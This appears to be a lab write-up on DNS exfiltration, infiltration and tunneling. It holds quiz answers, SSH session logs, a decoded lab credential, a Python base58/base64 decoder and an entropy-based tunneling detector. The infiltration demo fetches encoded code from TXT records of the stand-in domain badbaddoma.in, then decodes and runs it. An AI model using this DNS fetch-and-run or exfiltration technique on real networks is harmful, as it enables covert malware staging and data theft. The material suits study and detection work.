Techniques used to exfiltrate and infiltrate data.
Client machine reaches out to a DNS server to resolve a Fully Qualified Domain Name (FQDN) to an IP address.
How DNS is used as a data exfiltration and data infiltration tool via DNS queries.
DNS tunneling and how it is used to tunnel other protocols, such as HTTP, through DNS.
What is DNS?
The Domain Name System is a naming system that resolves domain names to IP addresses.
If you were on Windows, what command could you use to query a txt record for 'youtube.com'?
Answer: nslookup -type=txt youtube.com
If you were on Linux, what command could you use to query a txt record for 'facebook.com'?
Answer: dig facebook.com TXT
AAAA stores what type of IP Address along with the hostname?
Answer: IPv6
Maximum characters for a DNS TXT Record is 256. (Yay/Nay)
Answer: Nay (It is 255 characters)
What DNS Record provides a domain name in reverse-lookup?
Answer: PTR
What would the reverse-lookup be for the following IPv4 Address? (192.168.203.2)
Answer: 2.203.168.192.in-addr.arpa
Steps to Reproduce:
$ nslookup -type=PTR 192.168.203.2
Server:         106.51.113.29
Address:        106.51.113.29#53

** server can't find 2.203.168.192.in-addr.arpa: NXDOMAIN
DNS Exfiltration
DNS Exfiltration is a cyberattack on servers via the DNS, which can be performed manually or automatically.
In a manual scenario, attackers often gain unauthorized physical access to the targeted device to extract data from the environment.
In automated DNS exfiltration, attackers use malware to conduct the data exfiltration while inside the compromised network.
DNS is a service that is usually available on a target machine, and outbound DNS traffic (typically TCP or UDP port 53) is usually allowed. This makes DNS a prime candidate for attackers to use for exfiltrating data.
Data Exfiltration
Data exfiltration through DNS could allow an attacker to transfer a large volume of data from the target environment.
Moreover, DNS exfiltration is mostly used as a pathway to gather personal information such as social security numbers, intellectual property, or other personally identifiable information.
How is it done?
DNS exfiltration is mostly done by encoding the desired 'loot' into strings that are placed in the names of DNS queries (usually over UDP).
The query containing the loot is then sent to a rogue DNS server controlled by the attacker, which logs every request it receives.
To the untrained eye this can look like normal DNS traffic, or the requests can simply be lost in the shuffle of many legitimate DNS requests.
What is the maximum length of a DNS name?
Answer: 253 (Length includes dots)
This limits how much data we can exfiltrate in a single request!
DNS Exfiltration Practice - Orderlist
Log in to the machine and read the TASK file in the orderlist folder:
$ ssh user@10.10.47.165
The authenticity of host '10.10.47.165 (10.10.47.165)' can't be established.
ECDSA key fingerprint is SHA256:t/AngHz/N9sXqytgBiSq5vkmKrJaxoXgHyGRx1CdQjI.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.47.165' (ECDSA) to the list of known hosts.
user@10.10.47.165's password:
Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.4.0-186-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

86 packages can be updated.
63 updates are security updates.

Last login: Fri Feb 26 10:47:05 2021
user@user1:~$ ls
challenges  dns-exfil-infil  tshark-capture.instructions
user@user1:~$ cd challenges/
user@user1:~/challenges$ ls
exfiltration  infiltration
user@user1:~/challenges$ cd exfiltration/
user@user1:~/challenges/exfiltration$ ls
identify  orderlist
user@user1:~/challenges/exfiltration$ cd orderlist/
user@user1:~/challenges/exfiltration/orderlist$ ls
order.pcap  TASK
user@user1:~/challenges/exfiltration/orderlist$ cat TASK
The order.pcap file has suspecious queries.
Use the ~/dns-exfil-infil/packetyGrabber.py to decode the data and answer the questions accrodingly.

IDENTIFY THE DOMAIN NAME USED TO EXFILTRATE DATA
use the following command to see all DNS Queries
tshark -r order.pcap -T fields -e dns.qry.name
(ignore the .localdomain part)

Use the packetyGrabber.py located in ~/dns-exfil-infil/ folder to decode the DNS queries to a plain-text file.
python3 ~/dns-exfil-infil/packetyGrabber.py
IGNORE THE EXCEPTION THROWN AT THE END OF SCRIPT
Enter the plain-text after you have decoded the data using packetyGrabber.py, found in the ~/dns-exfil-infil/ folder.
Answer: administrator:s3cre7P@ssword
Steps to Reproduce:
The domain name used to EXFILTRATE data: badbaddoma.in
Run packetyGrabber.py to decode the data in the cap3.pcap file:
user@user1:~/challenges/exfiltration/identify$ python3 ~/dns-exfil-infil/packetyGrabber.py
File captured: cap3.pcap
Filename output: identity.txt
Domain Name (Example: badbaddoma.in): badbaddoma.in
[+] Domain Name set to badbaddoma.in
[+] Filtering for your domain name.
[+] Base58 decoded.
[+] Base64 decoded.
[+] Output to identity.txt
Exception ignored in: <bound method BaseEventLoop.__del__ of <_UnixSelectorEventLoop running=False closed=True debug=False>>
Traceback (most recent call last):
  File "/usr/lib/python3.5/asyncio/base_events.py", line 431, in __del__
  File "/usr/lib/python3.5/asyncio/unix_events.py", line 58, in close
  File "/usr/lib/python3.5/asyncio/unix_events.py", line 139, in remove_signal_handler
  File "/usr/lib/python3.5/signal.py", line 47, in signal
TypeError: signal handler must be signal.SIG_IGN, signal.SIG_DFL, or a callable object
user@user1:~/challenges/exfiltration/identify$ ls
cap1.pcap  cap2.pcap  cap3.pcap  identity.txt  TASK  TASK1.save
user@user1:~/challenges/exfiltration/identify$ cat identity.txt
administrator:s3cre7P@ssword
DNS Infiltration
DNS infiltration is the process in which malicious code is run to manipulate DNS servers, either through automated systems where attackers connect remotely to the network infrastructure, or manually.
Use case
DNS infiltration is primarily used for file dropping or malware staging efforts. With behavioral, signature-based, or reputation-based threat detection systems in place, it is possible that this attack method could be caught.
However, if this method of transporting data goes unnoticed, it could lead to malicious activity such as code execution in an organization's environment. Historically, this has caused havoc and disruption for various well-known companies.
The DNS protocol can be used as a covert channel that aids malware staging and execution efforts by communicating back to an attacker's C2 (Command and Control) server(s).
Demo
$ nslookup -type=txt rt1.badbaddoma.in | grep Za | cut -d \" -f2 > mal.py
$ python3 ~/dns-exfil-infil/packetySimple.py
Filename: mal.py
[+] Reading from file...
[+] Base58 decoded.
[+] Base64 decoded.
[+] Done, mal.py is decoded.
$ ls
mal.py
$ cat mal.py
while True: print("maLwAre CoDe")
Store the required data in the file using grep and cut.
user@user1:~/challenges/infiltration$ nslookup -type=TXT code.badbaddoma.in
Server:         10.0.0.2
Address:        10.0.0.2#53

Non-authoritative answer:
code.badbaddoma.in      text = "YeeTbunLbACdXq193g6VHXRuDQ9Y1upaAzA3UkpCr8yBBE68JEXU32wxNE44"

Authoritative answers can be found from:

user@user1:~/challenges/infiltration$ nslookup -type=TXT code.badbaddoma.in | grep Yee | cut -d \" -f2 > bad.py
user@user1:~/challenges/infiltration$ cat bad.py
YeeTbunLbACdXq193g6VHXRuDQ9Y1upaAzA3UkpCr8yBBE68JEXU32wxNE44
user@user1:~/challenges/infiltration$ python3 ~/dns-exfil-infil/packetySimple.py
Filename: bad.py
[+] Reading from file...
[+] Base58 decoded.
[+] Base64 decoded.
[+] Done, bad.py is decoded.
user@user1:~/challenges/infiltration$ cat bad.py
import os; print(os.uname()[2])
user@user1:~/challenges/infiltration$ python3 bad.py
4.4.0-186-generic
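Both sessions above rely on the same decoding, which packetyGrabber.py (exfiltration: encoded chunks carried as query labels) and packetySimple.py (infiltration: one encoded string carried in a TXT record) perform in the opposite order of the encoding: the data was base64-encoded, then base58-encoded so that only hostname-safe characters remain. The following is an added example written for this write-up, not the room's own scripts, that reimplements that decoding over constructed input. It assumes the Bitcoin base58 alphabet, the task's domain badbaddoma.in, and that a resolver search suffix (.localdomain) may be appended to some queries, as the TASK file notes.

```python
"""Added example for this write-up, not the room's packetyGrabber.py or
packetySimple.py: reverse the base64 -> base58 -> DNS encoding those tools
decode, for both the query-name form (exfiltration) and the TXT-record form
(infiltration).  Assumes the Bitcoin base58 alphabet."""
import base64
import re

B58_ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"

# Constructed sample queries, in the order `tshark -r order.pcap -T fields -e
# dns.qry.name` would print them: two legitimate lookups and two chunks of an
# encoded payload under the task's domain.  The resolver's search suffix
# (.localdomain) is appended to one of them, as the TASK file warns.
SAMPLE_QUERIES = [
    "www.example.com",
    "3YC.badbaddoma.in.localdomain",
    "6DQ.badbaddoma.in",
    "ntp.example.net",
]

# Constructed `nslookup -type=TXT` answer line in the same shape as the demo.
SAMPLE_TXT_LINE = 'code.badbaddoma.in\ttext = "3VDngt"'


def b58decode(text: str) -> bytes:
    """Base58 -> bytes (Bitcoin alphabet); each leading '1' is a 0x00 byte."""
    num = 0
    for ch in text:
        num = num * 58 + B58_ALPHABET.index(ch)  # ValueError on a non-base58 char
    body = num.to_bytes((num.bit_length() + 7) // 8, "big") if num else b""
    leading_ones = len(text) - len(text.lstrip("1"))
    return b"\x00" * leading_ones + body


def decode_payload(encoded: str) -> bytes:
    """Two layers: base58 on the outside (hostname-safe), base64 inside."""
    return base64.b64decode(b58decode(encoded), validate=True)


def extract_chunks(query_names, domain: str):
    """Return the encoded pieces carried under `domain`, in capture order."""
    chunks = []
    for name in query_names:
        name = name.rstrip(".")
        if name.endswith(".localdomain"):
            name = name[: -len(".localdomain")]
        if not name.endswith("." + domain):
            continue  # ordinary lookup, not part of the covert channel
        subdomain = name[: -len("." + domain)]
        chunks.append(subdomain.replace(".", ""))  # a chunk may span several labels
    return chunks


def decode_queries(query_names, domain: str) -> bytes:
    """What packetyGrabber.py does in principle: filter, join, base58, base64."""
    return decode_payload("".join(extract_chunks(query_names, domain)))


def decode_txt_record(nslookup_line: str) -> bytes:
    """Take the quoted TXT payload, as the grep/cut pipeline in the demo does."""
    match = re.search(r'"([^"]*)"', nslookup_line)
    if match is None:
        raise ValueError("no quoted TXT payload in line")
    return decode_payload(match.group(1))


if __name__ == "__main__":
    print(decode_queries(SAMPLE_QUERIES, "badbaddoma.in"))  # b'pwd'
    print(decode_txt_record(SAMPLE_TXT_LINE))                # b'hi'
```

One caveat worth knowing when decoding captures like these: base58 and base64 are case-sensitive, while DNS names are not, so the decoder has to preserve the exact case seen on the wire, and a resolver that rewrites the case of query names would corrupt this channel.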
DNS Tunneling
Companies will typically have firewalls, IDSs (Intrusion Detection Systems) and/or IPSs (Intrusion Prevention Systems) in place in order to block or alert on unwanted inbound and outbound protocols passing through their network.
The one protocol that is rarely monitored by companies is DNS. Because of this, attackers are able to smuggle a lot of otherwise blocked protocols through the perimeter by using DNS tunneling.
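Because DNS is so rarely monitored, the minimum a defender can do is look at what the queries themselves look like: encoded loot shows up as long, high-entropy subdomains repeated many times under one registered domain, which is exactly the shape of the queries decoded earlier. The following is an added example written for this write-up (not a tool from the room) that runs such a heuristic over a constructed query log; the log lines, the domain badbaddoma.in, the thresholds and the naive "last two labels" notion of a registered domain are all assumptions made for the example.

```python
"""Added example, not part of the room: a small heuristic detector for
DNS-tunnelling-style queries, run over a constructed query log.  Queries are
grouped by registered domain; a domain is flagged when its subdomains are
long, high-entropy and numerous, which is what encoded data looks like."""
import math
from collections import defaultdict

# Constructed log lines (timestamp, client, record type, queried name).  The
# three 32-character subdomains stand in for base58-encoded chunks.
SAMPLE_LOG = """\
2021-02-26T10:47:05 10.10.47.165 A    www.example.com
2021-02-26T10:47:05 10.10.47.165 A    3YC6DQtPz9W4mXkR2rBa7bLs8NcEf1Hg.badbaddoma.in
2021-02-26T10:47:06 10.10.47.165 A    mail.example.com
2021-02-26T10:47:06 10.10.47.165 A    Jv5TnqUxS4yFhZpKdGeMcW7R2B9oAk3L.badbaddoma.in
2021-02-26T10:47:07 10.10.47.165 AAAA api.github.com
2021-02-26T10:47:07 10.10.47.165 A    pQ2rTm8sVw4xYz6aBc9dEf3gHj5kLn7M.badbaddoma.in
2021-02-26T10:47:08 10.10.47.165 A    www.example.com
"""


def shannon_entropy(text: str) -> float:
    """Bits per character: encoded data scores high, hostnames like www low."""
    if not text:
        return 0.0
    counts = {ch: text.count(ch) for ch in set(text)}
    return -sum(c / len(text) * math.log2(c / len(text)) for c in counts.values())


def registered_domain(qname: str) -> str:
    """Assumption for the example: last two labels.  Real tooling should use a
    public-suffix list so that e.g. example.co.uk is handled correctly."""
    labels = qname.rstrip(".").split(".")
    return ".".join(labels[-2:])


def analyze(log_text: str, min_queries=3, min_subdomain_len=24, min_entropy=3.5):
    """Return (per-domain stats, sorted list of flagged domains).
    Thresholds are illustrative; tune them against your own baseline traffic."""
    per_domain = defaultdict(lambda: {"queries": 0, "longest": 0, "entropies": []})
    for line in log_text.splitlines():
        if not line.strip():
            continue
        qname = line.split()[-1].rstrip(".")
        domain = registered_domain(qname)
        subdomain = qname[: -len(domain) - 1] if qname != domain else ""
        entry = per_domain[domain]
        entry["queries"] += 1
        entry["longest"] = max(entry["longest"], len(subdomain))
        entry["entropies"].append(shannon_entropy(subdomain))

    stats, flagged = {}, []
    for domain, entry in per_domain.items():
        mean_entropy = sum(entry["entropies"]) / len(entry["entropies"])
        stats[domain] = {
            "queries": entry["queries"],
            "longest_subdomain": entry["longest"],
            "mean_entropy": round(mean_entropy, 2),
        }
        if (entry["queries"] >= min_queries
                and entry["longest"] >= min_subdomain_len
                and mean_entropy >= min_entropy):
            flagged.append(domain)
    return stats, sorted(flagged)


if __name__ == "__main__":
    stats, flagged = analyze(SAMPLE_LOG)
    for domain, s in stats.items():
        print(f"{domain:16} queries={s['queries']} longest={s['longest_subdomain']} "
              f"entropy={s['mean_entropy']}")
    print("flagged:", flagged)  # ['badbaddoma.in']
```

A detector like this only raises a candidate domain; the follow-up is to pull the queries for that domain out of the capture (tshark with the dns.qry.name field, as in the TASK file) and confirm what they carry. Volume per client and the ratio of NXDOMAIN answers are two further signals worth adding on real logs.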